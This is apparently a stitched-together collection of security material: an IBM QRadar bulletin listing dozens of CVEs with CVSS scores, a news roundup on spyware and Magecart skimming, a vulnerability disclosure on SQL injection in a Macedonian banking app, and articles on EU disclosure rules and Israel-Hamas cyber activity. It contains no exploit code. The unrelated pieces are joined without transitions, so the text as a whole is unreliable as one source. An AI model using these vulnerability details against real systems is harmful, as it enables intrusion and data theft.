IBM QRadar SIEM 7.5.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  IBM X-Force ID:  254138

**CVEID:**   CVE-2023-34981  
**DESCRIPTION:**   Apache Tomcat could allow a remote attacker to obtain sensitive information, caused by a flaw when a response did not have any HTTP headers set. By sending a specially crafted HTTP request, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258638 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-25147  
**DESCRIPTION:**   Apache Portable Runtime (APR) could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in the apr\_base64 functions. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246064 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2020-13956  
**DESCRIPTION:**   Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of malformed authority component in request URIs. By passing request URIs to the library as java.net.URI object, an attacker could exploit this vulnerability to pick the wrong target host for request execution.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/189572 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21830  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Serialization component could allow a remote attacker to cause a denial of service resulting in a low integrity impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/245038 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21843  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Sound component could allow a remote attacker to cause a denial of service resulting in a low integrity impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/245037 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-3564  
**DESCRIPTION:**   A use-after-free in the function l2cap\_reassemble\_sdu of the file net/bluetooth/l2cap\_core.c of the component Bluetooth in Linux Kernel could allow a remote authenticated attacker from within the local network to cause an unknown impact.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238741 for the current score.  
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-32067  
**DESCRIPTION:**   c-ares is vulnerable to a denial of service. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255936 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-33201  
**DESCRIPTION:**   The Bouncy Castle Crypto Package For Java (bc-java) could allow a remote attacker to obtain sensitive information, caused by not validating the X.500 name of any certificate in the implementation of the X509LDAPCertStoreSpi.java class. By using blind LDAP injection attack techniques, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258653 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N)

**CVEID:**   CVE-2023-28709  
**DESCRIPTION:**   Apache Tomcat is vulnerable to a denial of service, caused by an incomplete fix for CVE-2023-24998 related to the failure to limit the number of request parts to be processed in the file upload function. By sending a specially crafted request using query string parameters, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255893 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-30441  
**DESCRIPTION:**   IBM Runtime Environment, Java Technology Edition IBMJCEPlus and JSSE 8.0.7.0 through 8.0.7.11 components could expose sensitive information using a combination of flaws and configurations. IBM X-Force ID: 253188.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253188 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-40367  
**DESCRIPTION:**   IBM QRadar SIEM is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/263376 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2016-1000027  
**DESCRIPTION:**   Pivota Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw in the library. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/174367 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-34455  
**DESCRIPTION:**   snappy-java is vulnerable to a denial of service, caused by the use of an unchecked chunk length in the hasNextChunk function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258190 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-34454  
**DESCRIPTION:**   snappy-java is vulnerable to a denial of service, caused by an integer overflow in the compress function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258188 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-34453  
**DESCRIPTION:**   snappy-java is vulnerable to a denial of service, caused by an integer overflow in the shuffle function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258186 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40609  
**DESCRIPTION:**   IBM SDK, Java Technology Edition 7.1.5.18 and 8.0.8.0 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 236069.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236069 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-48339  
**DESCRIPTION:**   GNU Emacs could allow a local attacker to execute arbitrary commands on the system, caused by a flaw in the hfy-istext-command function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/248054 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-35116  
**DESCRIPTION:**   Fasterxml jackson-databind is vulnerable to a denial of service, caused by a stack-based overflow. By persuading a victim to open a specially crafted content, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258157 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-20867  
**DESCRIPTION:**   VMware Tools could allow a local authenticated attacker to bypass security restrictions, caused by the failure to authenticate host-to-guest operations in the vgauth module. An attacker could exploit this vulnerability using a fully compromised ESXi host to bypass authentication and obtain access to the guest virtual machine.  
CVSS Base score: 3.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257845 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2022-21426  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the JAXP component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224714 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-26048  
**DESCRIPTION:**   Eclipse Jetty is vulnerable to a denial of service, caused by an out of memory flaw in the HttpServletRequest.getParameter() or HttpServletRequest.getParts() function. By sending a specially crafted multipart request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253356 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-26049  
**DESCRIPTION:**   Eclipse Jetty could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw during nonstandard cookie parsing. By sending a specially crafted request to tamper with the cookie parsing mechanism, an attacker could exploit this vulnerability to obtain values from other cookies, and use this information to launch further attacks against the affected system.  
CVSS Base score: 4.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-30994  
**DESCRIPTION:**   IBM QRadar SIEM uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254138 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-38408  
**DESCRIPTION:**   OpenSSH could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the forwarded ssh-agent. By sending specially crafted requests, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/261022 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-2828  
**DESCRIPTION:**   ISC BIND is vulnerable to a denial of service, caused by a flaw that allows the named's configured cache size limit to be significantly exceeded. By querying the resolver for specific RRsets in a certain order, a remote attacker could exploit this vulnerability to exhaust all memory on the host.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258607 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-34149  
**DESCRIPTION:**   Apache Struts is vulnerable to a denial of service, caused by a flaw with only handling setProperty() but not getProperty(). By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257947 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-25652  
**DESCRIPTION:**   Git could allow a remote attacker to bypass security restrictions. By feeding specially crafted input to \`git apply --reject, an attacker could exploit this vulnerability to overwrite a path outside the working tree.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253693 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-29007  
**DESCRIPTION:**   Git could provide weaker than expected security, caused by a configuration injection flaw. A remote attacker could exploit this vulnerability to launch further attacks on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253700 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-32697  
**DESCRIPTION:**   SQLite JDBC could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a flaw when JDBC url is attacker controlled. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/256159 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-21930  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the JSSE component could allow an unauthenticated attacker to cause high confidentiality impact and high integrity impact.  
CVSS Base score: 7.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253115 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2023-21967  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the JSSE component could allow a remote attacker to cause high availability impact.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253156 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-21954  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Hotspot component could allow a remote attacker to cause high confidentiality impact.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253166 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-21939  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Swing component could allow a remote attacker to cause integrity impact.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253168 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21968  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE and GraalVM Enterprise Edition related to the Libraries component could allow an unauthenticated attacker to cause low integrity impact.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253083 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21937  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Networking component could allow a remote attacker to cause integrity impact.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253167 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21938  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Libraries component could allow a remote attacker to cause integrity impact.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253155 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-2597  
**DESCRIPTION:**   Eclipse Openj9 is vulnerable to a buffer overflow, caused by improper bounds checking by the getCachedUTFString() function. By using specially crafted input, a local authenticated attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255906 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-2976  
**DESCRIPTION:**   Google Guava could allow a local authenticated attacker to obtain sensitive information, caused by a flaw with using Java's default temporary directory for file creation in FileBackedOutputStream. By sending a specially crafted request, an attacker could exploit this vulnerability to access the files in the default Java temporary directory, and use this information to launch further attacks against the affected system.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258199 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-34396  
**DESCRIPTION:**   Apache Struts is vulnerable to a denial of service, caused by a flaw when processing Multipart request containing non-file normal form fields. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257946 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

CVE-2023-30994: Security Bulletin: IBM QRadar SIEM includes components with known vulnerabilities

Plus: Hamas raised millions in crypto, Exxon used hacked data, and more.

The media consortium, along with security researchers from Amnesty International and Google’s Threat Analysis Group, were able to show Vietnam’s connection to the Predator hacking campaign through documents they obtained that detail the Vietnamese government’s contract with Intellexa in 2020, and later an extension of the deal to allow the use of the Predator software. The internal documents went so far as to capture the response of Intellexa’s founder, Israeli former military hacker turned entrepreneur Tal Dilian, when the deal was announced: “Wooow!!!!” Vietnam’s government would later target French officials with Predator before this year’s campaign targeting US congressmen.

Despite efforts by Israel and other nations to cut off funding to Hamas in recent years, the group raised millions of dollars worth of cryptocurrency before the past weekend’s attack that killed more than a thousand Israelis. An analysis by _The Wall Street Journal_ found that Hamas, Palestinian Islamic Jihad, and Hezbollah had collectively raised hundreds of millions in crypto over the past several years, with $41 million going to Hamas specifically. Given that the _Journal_ learned of that funding in part through Israeli seizures of crypto accounts, however, it’s not clear how much of that money was frozen or seized versus how much might have actually been successfully laundered or liquidated by Hamas and other groups. 

In response to the weekend’s attacks, the Israeli government and the world’s largest crypto exchange, Binance, both announced that a new round of Hamas crypto accounts had been frozen. Though crypto has helped Hamas and other groups move funds across borders, its traceability on blockchains has presented a challenge for designated terrorist groups. In 2021, for instance, Hamas asked its supporters to stop making donations via cryptocurrency, due to the ease of tracking those transactions and unmasking contributors.

Last year, _Reuters_ reporters Chris Bing and Raphael Satter published an investigation into Aviram Azari, an Israeli private investigator who is accused of using mercenary hackers to gather intelligence on the critics of major corporations involved in lawsuits against them. 

Now, prosecutors in the Southern District of New York, where Azari has been convicted on criminal charges, have filed a sentencing memo that notes that activists’ communications stolen by Azari’s hackers were later used by Exxon in the company’s attempts to head off investigations and lawsuits by state attorneys general. The memo still doesn’t name Exxon as Azari’s client, but it implicitly suggests a link between the company and Azari: Prosecutors point in their memo to leaks of climate activists’ private emails to media, which were later cited by Exxon in their responses to state attorney generals as evidence of underhanded tactics by activists as they tried to prove that Exxon knew and covered up the role of fossil fuels in climate change. A Massachusetts lawsuit against Exxon that resulted from the state’s investigation is ongoing.

Internet giant Akamai warned this week that the infamous Magecart hacker crew, long focused on credit card fraud, has developed a clever new technique for spoofing credit card payment fields. The hackers managed to hide their malicious scripts in the 404 “page not found” error pages of ecommerce sites, then trigger those pages to load a spoofed payment field that impersonates a checkout page to steal credit card information. “The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion,” warned Akamai researcher Roman Lvovsky. Akamai noted that the technique was used on the website of significant brands in the food and retail industries but declined to name them.

The US Congress Was Targeted With Predator Spyware

The mobile application or the affected API suffers from an SQL Injection vulnerability. Input passed to the parameters that are associated to international transfer is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and disclose sensitive information.

Title: NLB mKlik Makedonija 3.3.12 SQL Injection  
Advisory ID: ZSL-2023-5797  
Type: Local/Remote  
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data  
Risk: (3/5)  
Release Date: 14.10.2023

**Summary**

NLB mKlik е мобилна апликација наменета за физички лица, корисници на услугите на НЛБ Банка, која овозможува преглед на различните продукти кои корисниците ги имаат во Банката како и извршување на различни видови на трансакции на едноставен и пред се безбеден начин во било кој период од денот. NLB mKlik апликацијата може да се користи со Android верзија 5.0 или понова.

**Description**

The mobile application or the affected API suffers from an SQL Injection vulnerability. Input passed to the parameters that are associated to international transfer is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and disclose sensitive information.

**Vendor**

NLB Banka AD Skopje - https://www.nlb.mk

**Affected Version**

3.3.12

**Tested On**

Android 13

**Vendor Status**

\[23.12.2022\] Vulnerability discovered.  
\[23.12.2022\] Vendor contacted.  
\[26.12.2022\] Vendor responds asking more details.  
\[28.12.2022\] Sent details to the vendor, not encrypted. Asked for confirmation and next steps.  
\[28.12.2022\] Vendor thanks us for the cooperation.  
\[06.01.2023\] Asked vendor for update and plan for fix mob/web?  
\[09.01.2023\] Vendor informs that our request has been received and will be reviewed within the responsible department. After the department responds we will be notified.  
\[20.01.2023\] Asked vendor to provide status update and confirmation and to communicate more often.  
\[23.01.2023\] Vendor informs that our request is sent to the responsible department. After the department responds we will be notified.  
\[13.10.2023\] No response from the vendor.  
\[14.10.2023\] Public security advisory released.

**PoC**

nlbmklik\_sqli.txt

**Credits**

Vulnerability discovered by Neurogenesia - <neurogenesia@segfault.mk\>

**References**

\[1\] https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.tutunskamk.production

**Changelog**

\[14.10.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

NLB mKlik Makedonija 3.3.12 SQL Injection

The Cyber Resilience Act's requirement to disclose vulnerabilities within 24 hours could expose organizations to attacks — or government surveillance.

The European Union (EU) may soon require software publishers to disclose unpatched vulnerabilities to government agencies within 24 hours of an exploitation. But many IT security professionals want this new rule, set out in Article 11 of the EU's Cyber Resilience Act (CRA), to be reconsidered.

The rule requires vendors to disclose that they know about a vulnerability actively being exploited within one day of learning about it, regardless of patch status. Some security professionals see the potential of governments abusing the vulnerability disclosure requirements for intelligence or surveillance purposes.

In an open letter signed by 50 prominent cybersecurity professionals across industry and academia, among them representatives from Arm, Google, and Trend Micro, the signatories argue that the 24-hour window is not enough time — and would also open doors to adversaries jumping on the vulnerabilities without allowing organizations enough time to fix the issues.

"While we appreciate the CRA's aim to enhance cybersecurity in Europe and beyond, we believe that the current provisions on vulnerability disclosure are counterproductive and will create new threats that undermine the security of digital products and the individuals who use them," the letter states.

Gopi Ramamoorthy, senior director of security and GRC at Symmetry Systems, says there is no disagreement about the urgency of patching the vulnerabilities. The concerns center on publicizing the vulnerabilities before updates are available, which leaves organizations at risk of attack and unable to do anything to prevent it.

"Publishing the vulnerability information before patching has raised concerns that it may enable further exploitation of the unpatched systems or devices and put private companies, and citizens, at further risk," Ramamoorthy says.

**Prioritize Patching Over Surveillance**

Callie Guenther, senior manager of cyber threat research at Critical Start, says the intent behind the CTA is commendable, but it's vital to consider the broader implications and potential unintended consequences of governments having access to vulnerability information before updates are available.

"Governments have a legitimate interest in ensuring national security," she says. "However, using vulnerabilities for intelligence or offensive capabilities can leave citizens and infrastructure exposed to threats."

A balance must be struck wherein governments prioritize patching and protecting systems over exploiting vulnerabilities, Guenther says, proposing some alternative approaches for vulnerability disclosure, starting with tiered disclosure.

"Depending on the severity and impact of a vulnerability, varying time frames for disclosure can be set," she says. "Critical vulnerabilities may have a shorter window, while less severe issues could be given more time."

A second alternative Guenther describes concerns preliminary notification, where vendors can be given a preliminary notification with a brief grace period before the detailed vulnerability is disclosed to a wider audience.

A third way focuses on coordinated vulnerability disclosure, which encourages a system where researchers, vendors, and governments work together to assess, patch, and disclose vulnerabilities responsibly.

Any rule must include explicit clauses to prohibit the misuse of disclosed vulnerabilities for surveillance or offensive purposes, she adds.

"Additionally, only select personnel with adequate clearance and training should have access to the database, reducing the risk of leaks or misuse," Guenther says. "Even with explicit clauses and restrictions, there are numerous challenges and risks that can arise."

**When, How, and How Much to Disclose**

Responsible disclosure of vulnerabilities is a process that has, traditionally, included a thoughtful approach that enabled organizations and security researchers to understand the risks and develop patches before exposing the vulnerability to potential threat actors, notes John A. Smith, CEO at Conversant Group.

"While the CRA may not require deep details about the vulnerability, the fact that one is now known to be present is enough to get threat actors probing, testing, and working to find an active exploit," he cautions.

From Smith's perspective, the vulnerability should also not be reported to any individual government or the EU; that requirement will reduce consumer confidence and damage commerce due to nation-state spying risks.

"Disclosure is important — absolutely. But we must weigh the pros and cons of when, how, and how much detail is provided during research and discovery to mitigate risk," he says.

An alternative to this "arguably knee-jerk approach," Smith says, is to require software companies to acknowledge reported vulnerabilities within a specified but expedited time frame, and then require them to report back on progress to the discovering entity regularly, ultimately providing a public fix within a maximum of 90 days.

Guidelines on how to receive and disclose vulnerability information, as well as techniques and policy considerations for reporting, are already outlined in ISO/IEC 29147.

**Impacts Beyond EU**

The US has an opportunity to observe, learn, and subsequently develop well-informed cybersecurity policies, as well as proactively prepare for any potential ramifications if Europe moves forward too quickly, Guenther adds.

"For US companies, this development is of paramount importance," she says. "Many American corporations operate on a global scale, and regulatory shifts in the EU could influence their global operations."

The ripple effect of the EU's regulatory decisions, as evidenced by the General Data Protection Regulation's influence on the California Consumer Privacy Act and other US privacy laws, suggests that European decisions could presage similar regulatory considerations in the US, she points out.

"Any vulnerability disclosed in haste due to EU regulations doesn't confine its risks to Europe," Guenther cautions. "US systems employing the same software would also be exposed."

Security Pros Warn That EU's Vulnerability Disclosure Rule Is Risky

Mandiant's John Hultquist says to expect anti-Israel influence and espionage campaigns to ramp up as the war grinds on.

Researchers are on the lookout for state-sponsored information operations springing from the Israel-Hamas conflict, but so far, no major initiatives have cropped up. Yet that could quickly change as more hacktivists and espionage actors enter the fray.

On a press call held this week, John Hultquist, chief analyst for Mandiant Intelligence at Google Cloud, said that so far, no "coordinated cyber activity" has been identified, but attacks are expected to increase over time as the situation continues. He called out distributed denial-of-service (DDoS) activity as a possible precursor to other types of political activity, naming Anonymous Sudan in particular as being active.

And meanwhile, he noted, expect disruptive threats begin to ramp up — or at least claims of critical infrastructure hacks.

**The Beginning of Influence Operations**

Information operations have twin definitions: They can refer to the collection of tactical information about an adversary, and/or the spread of propaganda in pursuit of a competitive advantage over an opponent.

On the latter front, Hultquist said two notable information operations campaigns have been identified so far. The first is related to Iran, which he said is "promoting narratives related to the crisis." In particular, this has involved Iranian posing as Egyptians to stir up historical hostilities in influence campaigns. In previous influence instances, groups have leveraged networks of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests, including anti-Israeli and pro-Palestinian themes.

The messages claim that Israel was humiliated by a small force, and that this exposed the weakness of one of the most advanced military superpowers, and that Israeli soldiers are now afraid of Hamas. Hultquist said these claims have not been validated, and merit "extreme skepticism."

Another information operation campaign being monitored is related to the Dragon Bridge campaign, which was identified last year as supporting the political interests of China. Hultquist said that it was seeing activity from multiple accounts associated with the Dragon Bridge campaign and that this is consistent with how the group follows news cycles and ongoing crises to portray the United States and its allies in a negative light.

In this instance, the accounts are amplifying the stance that the initial attack on Oct. 7 was a failing by the Israeli government, which didn't seem to be aware of the incoming attacks.

Hultquist said: "The silver lining is we haven't had any indication that it's getting major pickup or authentic traction, which is consistent with previous Dragon Bridge campaigns. It's one thing to broadcast these messages and create this content. It's quite another to actually penetrate the consciousness of everyday citizens."

**Beyond Influence Campaigns: Next Phase of Attacks**

Hultquist said that going forward, more espionage activity is expected, especially from actors related to Iran and Lebanon-based Hezbollah. He also said that he expects to see activity designed to look like financially motivated cybercrime, including extortion-based ransomware deployments where no money is collected, just a threat is made around data exfiltration and leaking.

"We have definitely seen Iranian actors do exactly that in Israel, and that's something that we're sort of anticipating," he said.

Meanwhile, threats and posturing against critical infrastructure will ramp up. Just this week, threat groups declared their intention to launch disruptive attacks against Israel, Palestine, and their supporters, while Anonymous Sudan claimed it attacked the Jerusalem Post. However, Hultquist did call out the amount of "dubious information" about the severity of such attacks, and noted that many claims to successfully hit major targets are just another form of influence activity.

